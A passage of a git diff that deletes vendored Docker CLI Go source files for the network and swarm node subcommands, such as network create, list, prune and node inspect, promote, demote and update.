opts.ipamAux.GetAll()) - if err != nil { - return err - } - - // Construct network create request body - nc := types.NetworkCreate{ - Driver: opts.driver, - Options: opts.driverOpts.GetAll(), - IPAM: &network.IPAM{ - Driver: 
opts.ipamDriver, - Config: ipamCfg, - Options: opts.ipamOpt.GetAll(), - }, - CheckDuplicate: true, - Internal: opts.internal, - EnableIPv6: opts.ipv6, - Attachable: opts.attachable, - Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), - } - - resp, err := client.NetworkCreate(context.Background(), opts.name, nc) - if err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "%s\n", resp.ID) - return nil -} - -// Consolidates the ipam configuration as a group from different related configurations -// user can configure network with multiple non-overlapping subnets and hence it is -// possible to correlate the various related parameters and consolidate them. -// consoidateIpam consolidates subnets, ip-ranges, gateways and auxiliary addresses into -// structured ipam data. -func consolidateIpam(subnets, ranges, gateways []string, auxaddrs map[string]string) ([]network.IPAMConfig, error) { - if len(subnets) < len(ranges) || len(subnets) < len(gateways) { - return nil, fmt.Errorf("every ip-range or gateway must have a corresponding subnet") - } - iData := map[string]*network.IPAMConfig{} - - // Populate non-overlapping subnets into consolidation map - for _, s := range subnets { - for k := range iData { - ok1, err := subnetMatches(s, k) - if err != nil { - return nil, err - } - ok2, err := subnetMatches(k, s) - if err != nil { - return nil, err - } - if ok1 || ok2 { - return nil, fmt.Errorf("multiple overlapping subnet configuration is not supported") - } - } - iData[s] = &network.IPAMConfig{Subnet: s, AuxAddress: map[string]string{}} - } - - // Validate and add valid ip ranges - for _, r := range ranges { - match := false - for _, s := range subnets { - ok, err := subnetMatches(s, r) - if err != nil { - return nil, err - } - if !ok { - continue - } - if iData[s].IPRange != "" { - return nil, fmt.Errorf("cannot configure multiple ranges (%s, %s) on the same subnet (%s)", r, iData[s].IPRange, s) - } - d := iData[s] - d.IPRange = r - match = true - } - 
if !match { - return nil, fmt.Errorf("no matching subnet for range %s", r) - } - } - - // Validate and add valid gateways - for _, g := range gateways { - match := false - for _, s := range subnets { - ok, err := subnetMatches(s, g) - if err != nil { - return nil, err - } - if !ok { - continue - } - if iData[s].Gateway != "" { - return nil, fmt.Errorf("cannot configure multiple gateways (%s, %s) for the same subnet (%s)", g, iData[s].Gateway, s) - } - d := iData[s] - d.Gateway = g - match = true - } - if !match { - return nil, fmt.Errorf("no matching subnet for gateway %s", g) - } - } - - // Validate and add aux-addresses - for key, aa := range auxaddrs { - match := false - for _, s := range subnets { - ok, err := subnetMatches(s, aa) - if err != nil { - return nil, err - } - if !ok { - continue - } - iData[s].AuxAddress[key] = aa - match = true - } - if !match { - return nil, fmt.Errorf("no matching subnet for aux-address %s", aa) - } - } - - idl := []network.IPAMConfig{} - for _, v := range iData { - idl = append(idl, *v) - } - return idl, nil -} - -func subnetMatches(subnet, data string) (bool, error) { - var ( - ip net.IP - ) - - _, s, err := net.ParseCIDR(subnet) - if err != nil { - return false, fmt.Errorf("Invalid subnet %s : %v", s, err) - } - - if strings.Contains(data, "/") { - ip, _, err = net.ParseCIDR(data) - if err != nil { - return false, fmt.Errorf("Invalid cidr %s : %v", data, err) - } - } else { - ip = net.ParseIP(data) - } - - return s.Contains(ip), nil -} diff --git a/vendor/github.com/docker/docker/cli/command/network/disconnect.go b/vendor/github.com/docker/docker/cli/command/network/disconnect.go deleted file mode 100644 index c9d9c14a13..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/disconnect.go +++ /dev/null @@ -1,41 +0,0 @@ -package network - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type disconnectOptions 
struct { - network string - container string - force bool -} - -func newDisconnectCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := disconnectOptions{} - - cmd := &cobra.Command{ - Use: "disconnect [OPTIONS] NETWORK CONTAINER", - Short: "Disconnect a container from a network", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.network = args[0] - opts.container = args[1] - return runDisconnect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force the container to disconnect from a network") - - return cmd -} - -func runDisconnect(dockerCli *command.DockerCli, opts disconnectOptions) error { - client := dockerCli.Client() - - return client.NetworkDisconnect(context.Background(), opts.network, opts.container, opts.force) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/inspect.go b/vendor/github.com/docker/docker/cli/command/network/inspect.go deleted file mode 100644 index 1a86855f71..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/inspect.go +++ /dev/null @@ -1,45 +0,0 @@ -package network - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - names []string -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] NETWORK [NETWORK...]", - Short: "Display detailed information on one or more networks", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.names = args - return runInspect(dockerCli, opts) - }, - } - - cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts 
inspectOptions) error { - client := dockerCli.Client() - - ctx := context.Background() - - getNetFunc := func(name string) (interface{}, []byte, error) { - return client.NetworkInspectWithRaw(ctx, name) - } - - return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getNetFunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/list.go b/vendor/github.com/docker/docker/cli/command/network/list.go deleted file mode 100644 index 1a5d285103..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/list.go +++ /dev/null @@ -1,76 +0,0 @@ -package network - -import ( - "sort" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type byNetworkName []types.NetworkResource - -func (r byNetworkName) Len() int { return len(r) } -func (r byNetworkName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byNetworkName) Less(i, j int) bool { return r[i].Name < r[j].Name } - -type listOptions struct { - quiet bool - noTrunc bool - format string - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List networks", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display network IDs") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate the output") - flags.StringVar(&opts.format, "format", "", "Pretty-print networks using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 
'driver=bridge')") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - options := types.NetworkListOptions{Filters: opts.filter.Value()} - networkResources, err := client.NetworkList(context.Background(), options) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().NetworksFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().NetworksFormat - } else { - format = formatter.TableFormatKey - } - } - - sort.Sort(byNetworkName(networkResources)) - - networksCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewNetworkFormat(format, opts.quiet), - Trunc: !opts.noTrunc, - } - return formatter.NetworkWrite(networksCtx, networkResources) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/prune.go b/vendor/github.com/docker/docker/cli/command/network/prune.go deleted file mode 100644 index 9f1979e6b5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/prune.go +++ /dev/null @@ -1,73 +0,0 @@ -package network - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool -} - -// NewPruneCommand returns a new cobra prune command for networks -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove all unused networks", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for 
confirmation") - - return cmd -} - -const warning = `WARNING! This will remove all networks not used by at least one container. -Are you sure you want to continue?` - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (output string, err error) { - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().NetworksPrune(context.Background(), filters.Args{}) - if err != nil { - return - } - - if len(report.NetworksDeleted) > 0 { - output = "Deleted Networks:\n" - for _, id := range report.NetworksDeleted { - output += id + "\n" - } - } - - return -} - -// RunPrune calls the Network Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { - output, err := runPrune(dockerCli, pruneOptions{force: true}) - return 0, output, err -} diff --git a/vendor/github.com/docker/docker/cli/command/network/remove.go b/vendor/github.com/docker/docker/cli/command/network/remove.go deleted file mode 100644 index 2034b8709e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/remove.go +++ /dev/null @@ -1,43 +0,0 @@ -package network - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "rm NETWORK [NETWORK...]", - Aliases: []string{"remove"}, - Short: "Remove one or more networks", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args) - }, - } -} - -func runRemove(dockerCli *command.DockerCli, networks []string) error { - client := dockerCli.Client() - ctx := context.Background() - status := 0 - - for _, name := range networks { - if err := client.NetworkRemove(ctx, name); err != nil { - 
fmt.Fprintf(dockerCli.Err(), "%s\n", err) - status = 1 - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - - if status != 0 { - return cli.StatusError{StatusCode: status} - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/cmd.go b/vendor/github.com/docker/docker/cli/command/node/cmd.go deleted file mode 100644 index e71b9199ad..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/cmd.go +++ /dev/null @@ -1,43 +0,0 @@ -package node - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - apiclient "github.com/docker/docker/client" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -// NewNodeCommand returns a cobra command for `node` subcommands -func NewNodeCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "node", - Short: "Manage Swarm nodes", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newDemoteCommand(dockerCli), - newInspectCommand(dockerCli), - newListCommand(dockerCli), - newPromoteCommand(dockerCli), - newRemoveCommand(dockerCli), - newPsCommand(dockerCli), - newUpdateCommand(dockerCli), - ) - return cmd -} - -// Reference returns the reference of a node. The special value "self" for a node -// reference is mapped to the current node, hence the node ID is retrieved using -// the `/info` endpoint. 
-func Reference(ctx context.Context, client apiclient.APIClient, ref string) (string, error) { - if ref == "self" { - info, err := client.Info(ctx) - if err != nil { - return "", err - } - return info.Swarm.NodeID, nil - } - return ref, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/demote.go b/vendor/github.com/docker/docker/cli/command/node/demote.go deleted file mode 100644 index 33f86c6499..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/demote.go +++ /dev/null @@ -1,36 +0,0 @@ -package node - -import ( - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newDemoteCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "demote NODE [NODE...]", - Short: "Demote one or more nodes from manager in the swarm", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runDemote(dockerCli, args) - }, - } -} - -func runDemote(dockerCli *command.DockerCli, nodes []string) error { - demote := func(node *swarm.Node) error { - if node.Spec.Role == swarm.NodeRoleWorker { - fmt.Fprintf(dockerCli.Out(), "Node %s is already a worker.\n", node.ID) - return errNoRoleChange - } - node.Spec.Role = swarm.NodeRoleWorker - return nil - } - success := func(nodeID string) { - fmt.Fprintf(dockerCli.Out(), "Manager %s demoted in the swarm.\n", nodeID) - } - return updateNodes(dockerCli, nodes, demote, success) -} diff --git a/vendor/github.com/docker/docker/cli/command/node/inspect.go b/vendor/github.com/docker/docker/cli/command/node/inspect.go deleted file mode 100644 index fde70185f8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/inspect.go +++ /dev/null @@ -1,144 +0,0 @@ -package node - -import ( - "fmt" - "io" - "sort" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - 
"github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/go-units" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type inspectOptions struct { - nodeIds []string - format string - pretty bool -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] self|NODE [NODE...]", - Short: "Display detailed information on one or more nodes", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.nodeIds = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - getRef := func(ref string) (interface{}, []byte, error) { - nodeRef, err := Reference(ctx, client, ref) - if err != nil { - return nil, nil, err - } - node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) - return node, nil, err - } - - if !opts.pretty { - return inspect.Inspect(dockerCli.Out(), opts.nodeIds, opts.format, getRef) - } - return printHumanFriendly(dockerCli.Out(), opts.nodeIds, getRef) -} - -func printHumanFriendly(out io.Writer, refs []string, getRef inspect.GetRefFunc) error { - for idx, ref := range refs { - obj, _, err := getRef(ref) - if err != nil { - return err - } - printNode(out, obj.(swarm.Node)) - - // TODO: better way to do this? 
- // print extra space between objects, but not after the last one - if idx+1 != len(refs) { - fmt.Fprintf(out, "\n\n") - } else { - fmt.Fprintf(out, "\n") - } - } - return nil -} - -// TODO: use a template -func printNode(out io.Writer, node swarm.Node) { - fmt.Fprintf(out, "ID:\t\t\t%s\n", node.ID) - ioutils.FprintfIfNotEmpty(out, "Name:\t\t\t%s\n", node.Spec.Name) - if node.Spec.Labels != nil { - fmt.Fprintln(out, "Labels:") - for k, v := range node.Spec.Labels { - fmt.Fprintf(out, " - %s = %s\n", k, v) - } - } - - ioutils.FprintfIfNotEmpty(out, "Hostname:\t\t%s\n", node.Description.Hostname) - fmt.Fprintf(out, "Joined at:\t\t%s\n", command.PrettyPrint(node.CreatedAt)) - fmt.Fprintln(out, "Status:") - fmt.Fprintf(out, " State:\t\t\t%s\n", command.PrettyPrint(node.Status.State)) - ioutils.FprintfIfNotEmpty(out, " Message:\t\t%s\n", command.PrettyPrint(node.Status.Message)) - fmt.Fprintf(out, " Availability:\t\t%s\n", command.PrettyPrint(node.Spec.Availability)) - ioutils.FprintfIfNotEmpty(out, " Address:\t\t%s\n", command.PrettyPrint(node.Status.Addr)) - - if node.ManagerStatus != nil { - fmt.Fprintln(out, "Manager Status:") - fmt.Fprintf(out, " Address:\t\t%s\n", node.ManagerStatus.Addr) - fmt.Fprintf(out, " Raft Status:\t\t%s\n", command.PrettyPrint(node.ManagerStatus.Reachability)) - leader := "No" - if node.ManagerStatus.Leader { - leader = "Yes" - } - fmt.Fprintf(out, " Leader:\t\t%s\n", leader) - } - - fmt.Fprintln(out, "Platform:") - fmt.Fprintf(out, " Operating System:\t%s\n", node.Description.Platform.OS) - fmt.Fprintf(out, " Architecture:\t\t%s\n", node.Description.Platform.Architecture) - - fmt.Fprintln(out, "Resources:") - fmt.Fprintf(out, " CPUs:\t\t\t%d\n", node.Description.Resources.NanoCPUs/1e9) - fmt.Fprintf(out, " Memory:\t\t%s\n", units.BytesSize(float64(node.Description.Resources.MemoryBytes))) - - var pluginTypes []string - pluginNamesByType := map[string][]string{} - for _, p := range node.Description.Engine.Plugins { - // append to 
pluginTypes only if not done previously - if _, ok := pluginNamesByType[p.Type]; !ok { - pluginTypes = append(pluginTypes, p.Type) - } - pluginNamesByType[p.Type] = append(pluginNamesByType[p.Type], p.Name) - } - - if len(pluginTypes) > 0 { - fmt.Fprintln(out, "Plugins:") - sort.Strings(pluginTypes) // ensure stable output - for _, pluginType := range pluginTypes { - fmt.Fprintf(out, " %s:\t\t%s\n", pluginType, strings.Join(pluginNamesByType[pluginType], ", ")) - } - } - fmt.Fprintf(out, "Engine Version:\t\t%s\n", node.Description.Engine.EngineVersion) - - if len(node.Description.Engine.Labels) != 0 { - fmt.Fprintln(out, "Engine Labels:") - for k, v := range node.Description.Engine.Labels { - fmt.Fprintf(out, " - %s = %s\n", k, v) - } - } -} diff --git a/vendor/github.com/docker/docker/cli/command/node/list.go b/vendor/github.com/docker/docker/cli/command/node/list.go deleted file mode 100644 index 9cacdcf441..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/list.go +++ /dev/null @@ -1,115 +0,0 @@ -package node - -import ( - "fmt" - "io" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -const ( - listItemFmt = "%s\t%s\t%s\t%s\t%s\n" -) - -type listOptions struct { - quiet bool - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List nodes in the swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions 
provided") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - out := dockerCli.Out() - ctx := context.Background() - - nodes, err := client.NodeList( - ctx, - types.NodeListOptions{Filters: opts.filter.Value()}) - if err != nil { - return err - } - - if len(nodes) > 0 && !opts.quiet { - // only non-empty nodes and not quiet, should we call /info api - info, err := client.Info(ctx) - if err != nil { - return err - } - printTable(out, nodes, info) - } else if !opts.quiet { - // no nodes and not quiet, print only one line with columns ID, HOSTNAME, ... - printTable(out, nodes, types.Info{}) - } else { - printQuiet(out, nodes) - } - - return nil -} - -func printTable(out io.Writer, nodes []swarm.Node, info types.Info) { - writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - - fmt.Fprintf(writer, listItemFmt, "ID", "HOSTNAME", "STATUS", "AVAILABILITY", "MANAGER STATUS") - for _, node := range nodes { - name := node.Description.Hostname - availability := string(node.Spec.Availability) - - reachability := "" - if node.ManagerStatus != nil { - if node.ManagerStatus.Leader { - reachability = "Leader" - } else { - reachability = string(node.ManagerStatus.Reachability) - } - } - - ID := node.ID - if node.ID == info.Swarm.NodeID { - ID = ID + " *" - } - - fmt.Fprintf( - writer, - listItemFmt, - ID, - name, - command.PrettyPrint(string(node.Status.State)), - command.PrettyPrint(availability), - command.PrettyPrint(reachability)) - } -} - -func printQuiet(out io.Writer, nodes []swarm.Node) { - for _, node := range nodes { - fmt.Fprintln(out, node.ID) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/node/opts.go b/vendor/github.com/docker/docker/cli/command/node/opts.go deleted file mode 100644 index 7e6c55d487..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/opts.go +++ /dev/null @@ -1,60 +0,0 @@ -package node - -import ( 
- "fmt" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" -) - -type nodeOptions struct { - annotations - role string - availability string -} - -type annotations struct { - name string - labels opts.ListOpts -} - -func newNodeOptions() *nodeOptions { - return &nodeOptions{ - annotations: annotations{ - labels: opts.NewListOpts(nil), - }, - } -} - -func (opts *nodeOptions) ToNodeSpec() (swarm.NodeSpec, error) { - var spec swarm.NodeSpec - - spec.Annotations.Name = opts.annotations.name - spec.Annotations.Labels = runconfigopts.ConvertKVStringsToMap(opts.annotations.labels.GetAll()) - - switch swarm.NodeRole(strings.ToLower(opts.role)) { - case swarm.NodeRoleWorker: - spec.Role = swarm.NodeRoleWorker - case swarm.NodeRoleManager: - spec.Role = swarm.NodeRoleManager - case "": - default: - return swarm.NodeSpec{}, fmt.Errorf("invalid role %q, only worker and manager are supported", opts.role) - } - - switch swarm.NodeAvailability(strings.ToLower(opts.availability)) { - case swarm.NodeAvailabilityActive: - spec.Availability = swarm.NodeAvailabilityActive - case swarm.NodeAvailabilityPause: - spec.Availability = swarm.NodeAvailabilityPause - case swarm.NodeAvailabilityDrain: - spec.Availability = swarm.NodeAvailabilityDrain - case "": - default: - return swarm.NodeSpec{}, fmt.Errorf("invalid availability %q, only active, pause and drain are supported", opts.availability) - } - - return spec, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/promote.go b/vendor/github.com/docker/docker/cli/command/node/promote.go deleted file mode 100644 index f47d783f4c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/promote.go +++ /dev/null @@ -1,36 +0,0 @@ -package node - -import ( - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func 
newPromoteCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "promote NODE [NODE...]", - Short: "Promote one or more nodes to manager in the swarm", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runPromote(dockerCli, args) - }, - } -} - -func runPromote(dockerCli *command.DockerCli, nodes []string) error { - promote := func(node *swarm.Node) error { - if node.Spec.Role == swarm.NodeRoleManager { - fmt.Fprintf(dockerCli.Out(), "Node %s is already a manager.\n", node.ID) - return errNoRoleChange - } - node.Spec.Role = swarm.NodeRoleManager - return nil - } - success := func(nodeID string) { - fmt.Fprintf(dockerCli.Out(), "Node %s promoted to a manager in the swarm.\n", nodeID) - } - return updateNodes(dockerCli, nodes, promote, success) -} diff --git a/vendor/github.com/docker/docker/cli/command/node/ps.go b/vendor/github.com/docker/docker/cli/command/node/ps.go deleted file mode 100644 index a034721d24..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/ps.go +++ /dev/null @@ -1,93 +0,0 @@ -package node - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/cli/command/task" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type psOptions struct { - nodeIDs []string - noResolve bool - noTrunc bool - filter opts.FilterOpt -} - -func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS] [NODE...]", - Short: "List tasks running on one or more nodes, defaults to current node", - Args: cli.RequiresMinArgs(0), - RunE: func(cmd *cobra.Command, args []string) error { - opts.nodeIDs = []string{"self"} - - if 
len(args) != 0 { - opts.nodeIDs = args - } - - return runPs(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runPs(dockerCli *command.DockerCli, opts psOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var ( - errs []string - tasks []swarm.Task - ) - - for _, nodeID := range opts.nodeIDs { - nodeRef, err := Reference(ctx, client, nodeID) - if err != nil { - errs = append(errs, err.Error()) - continue - } - - node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) - if err != nil { - errs = append(errs, err.Error()) - continue - } - - filter := opts.filter.Value() - filter.Add("node", node.ID) - - nodeTasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) - if err != nil { - errs = append(errs, err.Error()) - continue - } - - tasks = append(tasks, nodeTasks...) 
- } - - if err := task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc); err != nil { - errs = append(errs, err.Error()) - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/remove.go b/vendor/github.com/docker/docker/cli/command/node/remove.go deleted file mode 100644 index 19b4a96631..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/remove.go +++ /dev/null @@ -1,56 +0,0 @@ -package node - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - force bool -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := removeOptions{} - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] NODE [NODE...]", - Aliases: []string{"remove"}, - Short: "Remove one or more nodes from the swarm", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force remove a node from the swarm") - return cmd -} - -func runRemove(dockerCli *command.DockerCli, args []string, opts removeOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var errs []string - - for _, nodeID := range args { - err := client.NodeRemove(ctx, nodeID, types.NodeRemoveOptions{Force: opts.force}) - if err != nil { - errs = append(errs, err.Error()) - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", nodeID) - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/update.go b/vendor/github.com/docker/docker/cli/command/node/update.go deleted file mode 100644 index 
65339e138b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/update.go +++ /dev/null @@ -1,121 +0,0 @@ -package node - -import ( - "errors" - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" - "github.com/spf13/pflag" - "golang.org/x/net/context" -) - -var ( - errNoRoleChange = errors.New("role was already set to the requested value") -) - -func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - nodeOpts := newNodeOptions() - - cmd := &cobra.Command{ - Use: "update [OPTIONS] NODE", - Short: "Update a node", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runUpdate(dockerCli, cmd.Flags(), args[0]) - }, - } - - flags := cmd.Flags() - flags.StringVar(&nodeOpts.role, flagRole, "", "Role of the node (worker/manager)") - flags.StringVar(&nodeOpts.availability, flagAvailability, "", "Availability of the node (active/pause/drain)") - flags.Var(&nodeOpts.annotations.labels, flagLabelAdd, "Add or update a node label (key=value)") - labelKeys := opts.NewListOpts(nil) - flags.Var(&labelKeys, flagLabelRemove, "Remove a node label if exists") - return cmd -} - -func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, nodeID string) error { - success := func(_ string) { - fmt.Fprintln(dockerCli.Out(), nodeID) - } - return updateNodes(dockerCli, []string{nodeID}, mergeNodeUpdate(flags), success) -} - -func updateNodes(dockerCli *command.DockerCli, nodes []string, mergeNode func(node *swarm.Node) error, success func(nodeID string)) error { - client := dockerCli.Client() - ctx := context.Background() - - for _, nodeID := range nodes { - node, _, err := client.NodeInspectWithRaw(ctx, nodeID) - if err != nil { - return err - } - - err = mergeNode(&node) - if err != nil { - if err == errNoRoleChange { - 
